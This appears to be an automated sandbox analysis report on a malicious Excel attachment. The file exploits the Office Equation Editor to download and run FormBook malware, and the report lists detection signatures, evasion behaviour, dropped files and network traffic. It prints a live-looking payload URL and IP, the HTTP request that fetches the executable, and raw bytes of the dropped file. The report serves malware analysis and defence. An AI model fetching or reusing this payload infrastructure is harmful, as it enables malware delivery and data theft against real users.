Analysis Report Signature.xlsx

Overview

General Information

Sample Name:	Signature.xlsx
Analysis ID:	345177
MD5:	560a48512736572ec4abceb4ecf22250
SHA1:	56798f4c080101515e42b5678a2039ac6b8caaf3
SHA256:	1d93a4fcbcf81b40332da7aedaa9288ca16a2c0c588db5c78c6e349ce53478d4
Tags:	VelvetSweatshopxlsx
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Yara detected AntiVM_3

Yara detected FormBook

Drops PE files to the user root directory

Machine Learning detection for dropped file

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Sigma detected: Executables Started in Suspicious Folder

Sigma detected: Execution in Non-Executable Folder

Sigma detected: Suspicious Program Location Process Starts

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Document misses a certain OLE stream usually present in this Microsoft Office document type

Downloads executable code via HTTP

Drops PE files

Drops PE files to the user directory

Enables debug privileges

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Uses a known web browser user agent for HTTP communication

Yara signature match

Classification

Signatures

AV Detection:

Antivirus detection for URL or domain

Source: http://18.194.54.219/wows/hm1.exe

Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: http://18.194.54.219/wows/hm1.exe

Virustotal: Detection: 7%

Perma Link

Yara detected FormBook

Source: Yara match

File source: 00000004.00000002.2162537500.00000000030D9000.00000004.00000001.sdmp, type: MEMORY

Machine Learning detection for dropped file

Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hm1[1].exe	Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe

Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities:

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 18.194.54.219:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 18.194.54.219:80

Networking:

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 27 Jan 2021 19:02:53 GMTServer: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7Last-Modified: Wed, 27 Jan 2021 13:44:17 GMTETag: "9ac00-5b9e1f7b0f5e7"Accept-Ranges: bytesContent-Length: 633856Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 58 6d 11 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 a2 09 00 00 08 00 00 00 00 00 00 2e c1 09 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c0 09 00 57 00 00 00 00 e0 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a1 09 00 00 20 00 00 00 a2 09 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 06 00 00 00 e0 09 00 00 06 00 00 00 a4 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0a 00 00 02 00 00 00 aa 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c1 09 00 00 00 00 00 48 00 00 00 02 00 05 00 e4 7e 08 00 f0 41 01 00 03 00 00 00 01 00 00 06 ec 8e 02 00 f8 ef 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 23 00 00 00 00 00 00 00 2b 02 26 16 00 00 28 01 00 00 0a 28 02 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 03 00 00 0a 00 2a 00 01 10 00 00 02 00 05 00 0e 13 00 02 00 00 00 00 13 30 02 00 01 01 00 00 01 00 00 11 2b 02 26 16 00 38 e8 00 00 00 02 16 38 c7 00 00 00 00 2b 35 06 1f 56 61 0a 2b 1e 07 1f 60 61 0b 07 1f 53 59 45 04 00 00 00 05 00 00 00 10 00 00 00 17 00 00 00 4d 00 00 00 1f 35 0b 2b dd d0 01 00 00 06 26 1f 33 0b 2b d2 17 0a 1f 36 0b 2b cb 06 1f 4f 59 45 0a 00 00 00 07 00 00 00 0c 00 00 00 19 00 00 00 27 00 00 00 2f 00 00 00 37 00 00 00 45 00 00 00 4e 00 00 00 68 00 00 00 7f 00 00 00 1f 34 0b 2b 95 2b 8c 00 18 0a 2b 87 d0 03 00 00 06 26 1c 0a 38 7a ff ff ff 02 16 28 07 00 00 0a 19 0a 38 6c ff ff ff 00 1d 0a 38 64 ff ff ff 00 16 0a 38 5c ff ff ff 02 17 28 08 00 00 0a 1b 0a 38 4e ff ff ff 00 1f 0e 0a 38 45 ff ff ff 02 17 28 09 00 00 0a 2b 0a 28 0a 00 00

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: AMAZON-02US AMAZON-02US

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /wows/hm1.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 18.194.54.219Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E74B891E.emf

Jump to behavior

Source: global traffic

Source: vbc.exe, 00000004.00000002.2162212987.00000000020D1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: vbc.exe, vbc.exe, 00000005.00000002.2157599757.0000000000212000.00000020.00020000.sdmp, vbc.exe, 00000006.00000002.2158308519.0000000000212000.00000020.00020000.sdmp, vbc.exe, 00000007.00000002.2159068648.0000000000212000.00000020.00020000.sdmp, vbc.exe, 00000008.00000002.2159827958.0000000000212000.00000020.00020000.sdmp, vbc.exe, 00000009.00000002.2161125989.0000000000212000.00000020.00020000.sdmp, vbc.exe.2.dr	String found in binary or memory: http://thesnake.herokuapp.com/snakes
Source: E74B891E.emf.0.dr	String found in binary or memory: http://www.day.com/dam/1.0

E-Banking Fraud:

Yara detected FormBook

Source: Yara match

File source: 00000004.00000002.2162537500.00000000030D9000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Source: 00000004.00000002.2162537500.00000000030D9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2162537500.00000000030D9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hm1[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 4_2_003A3519	4_2_003A3519
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003A3808	4_2_003A3808
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003ADA91	4_2_003ADA91
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003A3AC0	4_2_003A3AC0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003ABAC0	4_2_003ABAC0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003A57E0	4_2_003A57E0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003A57DD	4_2_003A57DD
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003A5A38	4_2_003A5A38
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003ADAD2	4_2_003ADAD2
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003A8D46	4_2_003A8D46

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: Signature.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Yara signature match

Source: 00000004.00000002.2162537500.00000000030D9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2162537500.00000000030D9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: hm1[1].exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@14/6@0/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Signature.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR59B.tmp

Jump to behavior

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: unknown	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: unknown	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: unknown	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: unknown	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: unknown	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\vbc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: Signature.xlsx

Static file information: File size 2493440 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: Signature.xlsx

Initial sample: OLE indicators vbamacros = False

Source: Signature.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Source: initial sample	Static PE information: section name: .text entropy: 7.41524464929
Source: initial sample	Static PE information: section name: .text entropy: 7.41524464929

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hm1[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: Signature.xlsx

Stream path 'EncryptedPackage' entropy: 7.99993201198 (max. 8.0)

Malware Analysis System Evasion:

Yara detected AntiVM_3

Source: Yara match	File source: 00000004.00000002.2162212987.00000000020D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2852, type: MEMORY

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: vbc.exe, 00000004.00000002.2162212987.00000000020D1000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: vbc.exe, 00000004.00000002.2162212987.00000000020D1000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Contains long sleeps (>= 3 min)

Source: C:\Users\Public\vbc.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 824	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1980	Thread sleep time: -52785s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 912	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: vbc.exe, 00000004.00000002.2162212987.00000000020D1000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2162212987.00000000020D1000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: vbc.exe, 00000004.00000002.2162212987.00000000020D1000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: vbc.exe, 00000004.00000002.2162212987.00000000020D1000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Source: C:\Users\Public\vbc.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Enables debug privileges

Source: C:\Users\Public\vbc.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\Public\vbc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\Public\vbc.exe

Queries volume information: C:\Users\Public\vbc.exe VolumeInformation

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Source: Yara match

File source: 00000004.00000002.2162537500.00000000030D9000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Source: Yara match

File source: 00000004.00000002.2162537500.00000000030D9000.00000004.00000001.sdmp, type: MEMORY

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
18.194.54.219	unknown	United States		16509	AMAZON-02US	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://18.194.54.219/wows/hm1.exe	true	7%, Virustotal, Browse Avira URL Cloud: malware	unknown

AV Detection:

Antivirus detection for URL or domain

Source: http://18.194.54.219/wows/hm1.exe

Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: http://18.194.54.219/wows/hm1.exe

Virustotal: Detection: 7%

Perma Link

Yara detected FormBook

Source: Yara match

File source: 00000004.00000002.2162537500.00000000030D9000.00000004.00000001.sdmp, type: MEMORY

Machine Learning detection for dropped file

Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hm1[1].exe	Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe

Jump to behavior

Office Equation Editor has been started

Source: unknown

